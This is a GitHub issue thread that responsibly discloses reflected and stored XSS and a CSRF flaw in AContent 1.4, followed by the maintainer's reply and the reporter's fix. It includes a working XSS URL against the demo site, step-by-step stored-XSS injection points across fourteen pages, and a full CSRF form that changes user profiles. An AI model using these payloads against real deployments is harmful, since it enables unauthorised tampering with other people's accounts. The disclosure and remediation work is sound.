XSS and CSRF issues on v1.4

[metamorfosec]

Hello... I have found XSS and CSRF issues in atutor/AContent v1.4. I used AContent 1.4 Demo on your official website. Please let me know if you need additional information. I hope this is a right channel to disclose security issues because you requested to post any bugs to this GitHub Page. Regards.

Findings

XSS (Reflected)

https://atutordemos.000webhostapp.com/acontent/documentation/index.php?p="><script>alert(document.domain)</script>

XSS (Stored)

1 (editor/edit_content_folder.php)

1. In the Content Folder Title Field, please enter <script>alert(document.domain)</script> and then press Enter or click Save Button
2. Please click Delete Content Icon to trigger the JS alert

2 (editor/edit_content.php)

1. In the Title Field, please enter <script>alert(document.domain)</script> and then press Enter or click Save Button
2. Please click Delete Content Icon to trigger the JS alert

3 (editor/edit_content.php)

1. In the Title Field with HTML format selected, please enter any clickable name. For example, <script>test</script>.
2. In the Body, please enter <script>alert(document.domain)</script>
3. Click Preview Button to trigger the JS alert
4. Click Save Button
5. Click <script>test</script> to trigger the JS alert again

4 (tests/edit_test.php)

1. In the Title Field, please enter <script>alert(document.domain)</script>
2. Click Save Button to trigger the JS alert

5 (tests/edit_question_likert.php)

1. In the Question Field, please enter <script>alert(document.domain)</script>
2. Click Save Button to trigger the JS alert
3. We can also trigger the JS alert by clicking Preview or Delete Button
4. Every time when we on Question Bank (tests/question_db.php), JS alert also triggered

6 (tests/create_question_matchingdd.php)

1. In the Question Field, please enter <script>alert(document.domain)</script>
2. Click Save Button
3. We can trigger the JS alert by clicking Preview Button

7 (tests/create_question_matching.php)

1. In the Question Field, please enter <script>alert(document.domain)</script>
2. Click Save Button
3. We can trigger the JS alert by clicking Preview Button

8 (tests/create_question_multianswer.php)

1. In the Question Field, please enter <script>alert(document.domain)</script>
2. Click Save Button
3. We can trigger the JS alert by clicking Preview Button

9 (tests/create_question_multichoice.php)

1. In the Question Field, please enter <script>alert(document.domain)</script>
2. Click Save Button
3. We can trigger the JS alert by clicking Preview Button

10 (tests/create_question_long.php)

1. In the Question Field, please enter <script>alert(document.domain)</script>
2. Click Save Button
3. We can trigger the JS alert by clicking Preview Button

11 (tests/edit_question_ordering.php)

1. In the Question Field, please enter <script>alert(document.domain)</script>
2. Click Save Button
3. We can trigger the JS alert by clicking Preview Button

12 (tests/edit_question_truefalse.php)

1. In the Statement Field, please enter <script>alert(document.domain)</script>
2. Click Save Button to trigger the JS alert
3. We can also trigger the JS alert by clicking Preview or Delete Button

13 (tests/question_cats_manage.php)

1. In the Title Field, please enter <script>alert(document.domain)</script>
2. Press Enter or click Save Button to trigger the JS alert
3. We can also trigger the JS alert by clicking Delete Button

14 (course/course_property.php)

1. In the Title Field, please enter <script>alert(document.domain)</script>
2. Press Enter or click Save Button to trigger the JS alert

CSRF

1. Login at official website.
2. Save HTML code below and give it a name, e.g. CSRF_Payload.html.
3. Open and execute the payload on the same browser by clicking the CLICK ME Button

<html>
	<form method="post" action="https://atutordemos.000webhostapp.com/acontent/profile/index.php" name="form">
		<input name="password_error" type="hidden">
		<input type="hidden" name="form_password_hidden" value="">
		<input id="first_name" name="first_name" type="hidden" value="FIRST NAME">
		<input id="last_name" name="last_name" type="hidden" value="LAST NAME">
		<input type="checkbox" style="display:none" name="is_author" id="is_author" checked="checked" onclick="if (this.checked) jQuery('#table_is_author').show('slow'); else jQuery('#table_is_author').hide('slow');">
		<input id="organization" name="organization" type="hidden" size="50" maxlength="100" value="ORGANIZATION">
		<input id="phone" name="phone" type="hidden" size="30" maxlength="30" value="PHONE">
		<input id="address" name="address" type="hidden" size="50" maxlength="100" value="ADDRESS">
		<input id="city" name="city" type="hidden" size="30" maxlength="30" value="CITY">
		<input id="province" name="province" type="hidden" size="30" maxlength="30" value="PROVINCE">
		<input id="country" name="country" type="hidden" size="30" maxlength="30" value="COUNTRY">
		<input id="postal_code" name="postal_code" type="hidden" size="10" maxlength="10" value="POSTAL CODE">
		<!-- Click the button to execute this CSRF Payload -->
		<input type="submit" name="submit" value="CLICK ME" class="submit">
	</form>
</html>

Suggested Mitigations

1. For XSS issues, we can use input validation and escape function for all user supplied inputs. I see you made special characters become like <script>alert(document.domain)</script> on certain places, but no on many other places and therefore still vulnerable to XSS.
2. For CSRF issue, we can use CSRF Token. It would be better if Change Password and Change Email Address also use CSRF Token.

[gregrgay]

This application is no longer being maintained, though we will accept pull requests to address these issues.

[metamorfosec]

Hi, thank you for your response. I have forked your work to help address these issues. I will make a pull request later. Regards.

[gregrgay]

Will watch for your pull requests. Thx

[metamorfosec]

Hello.., I have just made a pull request. I have added a new folder called protection contains third party class or library to prevent XSS and CSRF. By the way, I cannot access edit test and question features because TR_ERROR_NO_ITEM_FOUND, so that I cannot reproduce number 4, 5, 11, and 12 for Stored XSS above. Anyway, I have updated the files related them like at create question feature. Some warning messages may be still appear and I still looking for the root cause. Regards.